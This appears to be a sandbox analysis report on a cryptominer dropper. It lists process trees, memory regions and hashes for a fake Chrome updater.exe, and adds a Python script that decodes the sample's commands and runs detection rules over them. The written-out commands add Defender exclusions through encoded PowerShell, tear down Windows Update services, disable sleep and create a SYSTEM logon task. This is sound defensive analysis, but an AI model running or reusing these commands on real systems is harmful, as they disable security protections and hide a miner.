        C:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr56
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
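The two chains above are the whole installation, read off the command lines. The conhost.exe that the sample wrote into (PID 628, then PID 1392 in the second run) first launches PowerShell with an -EncodedCommand whose UTF-16LE payload is Add-MpPreference, adding the user profile and the system drive as Defender exclusions; the payload is padded with inline <# #> block comments so the plain-text command never appears as one contiguous string. It then runs a cmd.exe one-liner that stops the Windows Update services, deletes their service keys, takes ownership of WaaSMedicSvc.dll and renames it, writes the WindowsUpdate\AU policy values and disables the update scheduler tasks; powercfg calls that zero every standby and hibernate timeout; and a SYSTEM logon task named GoogleUpdateTaskMachineQC that relaunches the copy dropped as C:\Program Files\Google\Chrome\updater.exe. The second chain repeats this from the task and ends with conhost.exe (PID 1392) setting the thread context of an explorer.exe it launched with a base64-looking argument; the xmrig yara hits are in that process (PID 1496) at 0x140000000, the default image base of a 64-bit PE, so the miner was mapped over the hollowed explorer.exe. The Python below is an added example, not part of the sandbox output: it decodes an -EncodedCommand argument, strips the comment padding, and runs a few triage rules over process-creation records constructed from this tree (parent image, image, command line). The record layout, the rule names, and the abridged cmd.exe and explorer.exe command lines are this example's own; the encoded string is the one from the report.

```python
"""Added example (not sandbox output): decode the -EncodedCommand argument from
the process tree above and run triage rules over process-creation records built
from its command lines. Record layout and rule names are this example's own."""
import base64
import re

# The exact -EncodedCommand argument from the report, split for line length.
ENCODED = (
    "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA"
    "PAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAA"
    "QAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoA"
    "UwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIA"
    "YwBlACAAPAAjAHIAeQAjAD4A"
)

# Constructed process-creation records (parent image, image, command line)
# modelled on the tree above: the cmd.exe one-liner and the explorer.exe
# argument are abridged, and the last two records are benign controls.
RECORDS = [
    {"parent": r"C:\Windows\System32\conhost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -EncodedCommand "' + ENCODED + '"'},
    {"parent": r"C:\Windows\System32\conhost.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc '
                r'& reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f '
                r'& takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\system32\powercfg.exe",
     "cmdline": "powercfg /x -standby-timeout-ac 0"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'schtasks /create /f /sc onlogon /rl highest /ru "System" '
                r'/tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""'},
    {"parent": r"C:\Windows\System32\conhost.exe",
     "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKl"
                r"IdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\system32\sc.exe",
     "cmdline": "sc query wuauserv"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\system32\powercfg.exe",
     "cmdline": "powercfg /x -standby-timeout-ac 30"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# usual short forms (assumption: extend the list for your own telemetry).
_ENC_RE = re.compile(r'-(?:e|ec|enc|encodedcommand)\s+"?([A-Za-z0-9+/=]{16,})"?', re.I)
_COMMENT_RE = re.compile(r"<#.*?#>", re.S)          # PowerShell block comments
_SVC = r"(?:UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)"
RULES = {
    "defender_exclusion": re.compile(
        r"\bAdd-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b", re.I | re.S),
    "update_service_tamper": re.compile(
        r"\bsc\s+(?:stop|delete|config)\s+" + _SVC + r"\b"
        + r"|\breg\s+delete\s+\S*\\Services\\" + _SVC + r"\b"
        + r"|\bWaaSMedicSvc\.dll\b", re.I),
    "sleep_prevention": re.compile(
        r"\bpowercfg\s+/x\s+-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", re.I),
    "system_logon_task": re.compile(
        r'\bschtasks\s+/create\b(?=.*\s/sc\s+onlogon\b)(?=.*\s/ru\s+"?system\b)', re.I),
}
_BLOB_RE = re.compile(r"\s[A-Za-z0-9+/]{64,}={0,2}(?:\s|$)")   # long base64-looking token


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script with <# ... #> comment padding
    removed and whitespace collapsed, or None if the command line has none."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))   # restore any stripped padding
    script = raw.decode("utf-16-le", errors="replace")     # PowerShell encodes UTF-16LE
    return " ".join(_COMMENT_RE.sub(" ", script).split())


def triage(records):
    """Map each rule name to the indices of the records that fire it."""
    hits = {}

    def fire(rule, idx):
        hits.setdefault(rule, []).append(idx)

    for idx, rec in enumerate(records):
        parent, image, cmd = _basename(rec["parent"]), _basename(rec["image"]), rec["cmdline"]
        decoded = decode_encoded_command(cmd)
        text = cmd if decoded is None else cmd + " " + decoded   # match the decoded script too
        for name, rx in RULES.items():
            if rx.search(text):
                fire(name, idx)
        # conhost.exe hosts consoles and does not launch programs; in the tree above the
        # sample wrote into conhost.exe (PID 628 / 1392) and used it to spawn cmd and powershell.
        if parent == "conhost.exe" and image != "conhost.exe":
            fire("conhost_spawns_child", idx)
        # explorer.exe takes paths and shell GUIDs, not a base64 blob: this is the hollowed
        # process (SetThreadContext 1392 -> 1496) that carries the miner image.
        if image == "explorer.exe" and _BLOB_RE.search(cmd):
            fire("explorer_with_base64_arg", idx)
    return hits


if __name__ == "__main__":
    print(decode_encoded_command(RECORDS[0]["cmdline"]))
    for rule, idxs in triage(RECORDS).items():
        print(rule, [_basename(RECORDS[i]["image"]) for i in idxs])
```

Run it and it prints the decoded exclusion command followed by each rule with the images that fired it; the two benign controls at the end of RECORDS (an sc query and a 30-minute standby timeout) fire nothing. On real telemetry, feed it Sysmon event 1 or EDR process-creation rows mapped to the same three fields. The conhost-parent rule is the most durable of the set because it does not depend on the service names, the task name or the drop path this particular sample chose.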
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files\Google\Chrome\updater.exe
Filesize 7.1MB
MD5 2144e985a1fb8a18636dee1b1fcf096f
SHA1 fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA256 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA512 48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Program Files\Google\Chrome\updater.exe
Filesize 7.1MB
MD5 2144e985a1fb8a18636dee1b1fcf096f
SHA1 fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA256 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA512 48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Windows\system32\drivers\etc\hosts
Filesize 2KB
MD5 c5227366b7a688ff23b01788718251aa
SHA1 9795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256 789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA512 8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
\Program Files\Google\Chrome\updater.exe
Filesize 7.1MB
MD5 2144e985a1fb8a18636dee1b1fcf096f
SHA1 fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA256 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA512 48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
memory/268-108-0x0000000000000000-mapping.dmp
memory/292-80-0x0000000000000000-mapping.dmp
memory/304-102-0x0000000000000000-mapping.dmp
memory/320-145-0x0000000000000000-mapping.dmp
memory/320-81-0x0000000000000000-mapping.dmp
memory/456-100-0x0000000000000000-mapping.dmp
memory/532-83-0x0000000000000000-mapping.dmp
memory/628-61-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp  Filesize 8KB
memory/628-124-0x0000000000000000-mapping.dmp
memory/628-60-0x000000001BAA0000-0x000000001BEBE000-memory.dmp  Filesize 4.1MB
memory/628-59-0x00000000001C0000-0x00000000005DE000-memory.dmp  Filesize 4.1MB
memory/636-77-0x0000000000000000-mapping.dmp
memory/692-139-0x0000000000000000-mapping.dmp
memory/700-120-0x0000000000000000-mapping.dmp
memory/780-76-0x0000000000000000-mapping.dmp
memory/780-140-0x0000000000000000-mapping.dmp
memory/828-146-0x0000000000000000-mapping.dmp
memory/828-82-0x0000000000000000-mapping.dmp
memory/872-58-0x0000000077A40000-0x0000000077BE9000-memory.dmp  Filesize 1.7MB
memory/872-55-0x0000000000400000-0x0000000001066000-memory.dmp  Filesize 12.4MB
memory/872-91-0x0000000000000000-mapping.dmp
memory/872-56-0x0000000077A40000-0x0000000077BE9000-memory.dmp  Filesize 1.7MB
memory/872-54-0x0000000000400000-0x0000000001066000-memory.dmp  Filesize 12.4MB
memory/872-57-0x0000000000400000-0x0000000001066000-memory.dmp  Filesize 12.4MB
memory/908-125-0x0000000000000000-mapping.dmp
memory/912-129-0x0000000000000000-mapping.dmp
memory/972-113-0x0000000000000000-mapping.dmp
memory/992-96-0x0000000001250000-0x0000000001EB6000-memory.dmp  Filesize 12.4MB
memory/992-166-0x0000000001250000-0x0000000001EB6000-memory.dmp  Filesize 12.4MB
memory/1048-78-0x0000000000000000-mapping.dmp
memory/1060-97-0x0000000000000000-mapping.dmp
memory/1068-126-0x0000000000000000-mapping.dmp
memory/1068-88-0x0000000000000000-mapping.dmp
memory/1108-121-0x0000000000000000-mapping.dmp
memory/1168-79-0x0000000000000000-mapping.dmp
memory/1200-143-0x0000000000000000-mapping.dmp
memory/1208-84-0x0000000000000000-mapping.dmp
memory/1232-73-0x0000000000000000-mapping.dmp
memory/1368-127-0x0000000000000000-mapping.dmp
memory/1380-68-0x0000000002644000-0x0000000002647000-memory.dmp  Filesize 12KB
memory/1380-69-0x000000000264B000-0x000000000266A000-memory.dmp  Filesize 124KB
memory/1380-62-0x0000000000000000-mapping.dmp
memory/1380-67-0x000000001B730000-0x000000001BA2F000-memory.dmp  Filesize 3.0MB
memory/1380-66-0x0000000002644000-0x0000000002647000-memory.dmp  Filesize 12KB
memory/1380-64-0x000007FEEDB90000-0x000007FEEE5B3000-memory.dmp  Filesize 10.1MB
memory/1380-65-0x000007FEED030000-0x000007FEEDB8D000-memory.dmp  Filesize 11.4MB
memory/1388-104-0x0000000000000000-mapping.dmp
memory/1392-72-0x0000000000000000-mapping.dmp
memory/1392-149-0x0000000001170000-0x0000000001176000-memory.dmp  Filesize 24KB
memory/1396-136-0x0000000000000000-mapping.dmp
memory/1400-70-0x0000000000000000-mapping.dmp
memory/1404-107-0x0000000000000000-mapping.dmp
memory/1412-134-0x0000000000000000-mapping.dmp
memory/1428-110-0x0000000000000000-mapping.dmp
memory/1428-144-0x0000000000000000-mapping.dmp
memory/1468-133-0x0000000000000000-mapping.dmp
memory/1484-150-0x0000000000060000-0x0000000000067000-memory.dmp  Filesize 28KB
memory/1484-152-0x0000000000060000-0x0000000000067000-memory.dmp  Filesize 28KB
memory/1484-153-0x00000000001D0000-0x00000000001D6000-memory.dmp  Filesize 24KB
memory/1496-167-0x0000000140000000-0x0000000140809000-memory.dmp  Filesize 8.0MB
memory/1496-160-0x0000000140000000-0x0000000140809000-memory.dmp  Filesize 8.0MB
memory/1496-172-0x0000000140000000-0x0000000140809000-memory.dmp  Filesize 8.0MB
memory/1496-171-0x0000000140000000-0x0000000140809000-memory.dmp  Filesize 8.0MB
memory/1496-169-0x0000000140000000-0x0000000140809000-memory.dmp  Filesize 8.0MB
memory/1496-175-0x0000000140000000-0x0000000140809000-memory.dmp  Filesize
8.0MB
-
memory/1496-165-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-164-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-162-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-173-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-158-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-156-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-155-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-177-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-178-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-179-0x0000000000070000-0x0000000000090000-memory.dmpFilesize
128KB
-
memory/1496-180-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1504-87-0x0000000000000000-mapping.dmp
-
memory/1504-130-0x0000000000000000-mapping.dmp
-
memory/1540-141-0x0000000000000000-mapping.dmp
-
memory/1540-75-0x0000000000000000-mapping.dmp
-
memory/1588-128-0x0000000000000000-mapping.dmp
-
memory/1608-89-0x0000000000000000-mapping.dmp
-
memory/1640-74-0x0000000000000000-mapping.dmp
-
memory/1652-90-0x0000000000000000-mapping.dmp
-
memory/1684-142-0x0000000000000000-mapping.dmp
-
memory/1700-71-0x0000000000000000-mapping.dmp
-
memory/1712-138-0x0000000000000000-mapping.dmp
-
memory/1712-101-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1712-103-0x0000000077A40000-0x0000000077BE9000-memory.dmpFilesize
1.7MB
-
memory/1712-93-0x0000000000000000-mapping.dmp
-
memory/1712-99-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1712-105-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1712-106-0x0000000077A40000-0x0000000077BE9000-memory.dmpFilesize
1.7MB
-
memory/1744-95-0x0000000000000000-mapping.dmp
-
memory/1752-123-0x0000000000000000-mapping.dmp
-
memory/1780-137-0x0000000000000000-mapping.dmp
-
memory/1808-147-0x0000000000000000-mapping.dmp
-
memory/1896-148-0x0000000000000000-mapping.dmp
-
memory/1900-86-0x0000000000000000-mapping.dmp
-
memory/1908-119-0x0000000000C4B000-0x0000000000C6A000-memory.dmpFilesize
124KB
-
memory/1908-117-0x0000000000C44000-0x0000000000C47000-memory.dmpFilesize
12KB
-
memory/1908-118-0x0000000000C4B000-0x0000000000C6A000-memory.dmpFilesize
124KB
-
memory/1908-116-0x000007FEEC5E0000-0x000007FEED13D000-memory.dmpFilesize
11.4MB
-
memory/1908-115-0x000007FEED140000-0x000007FEEDB63000-memory.dmpFilesize
10.1MB
-
memory/1908-111-0x0000000000000000-mapping.dmp
-
memory/1944-112-0x0000000000000000-mapping.dmp
-
memory/1988-135-0x0000000000000000-mapping.dmp
-
memory/2016-85-0x0000000000000000-mapping.dmp
-
memory/2028-131-0x0000000000000000-mapping.dmp
-
memory/2044-98-0x0000000000000000-mapping.dmp
-
memory/2044-132-0x0000000000000000-mapping.dmp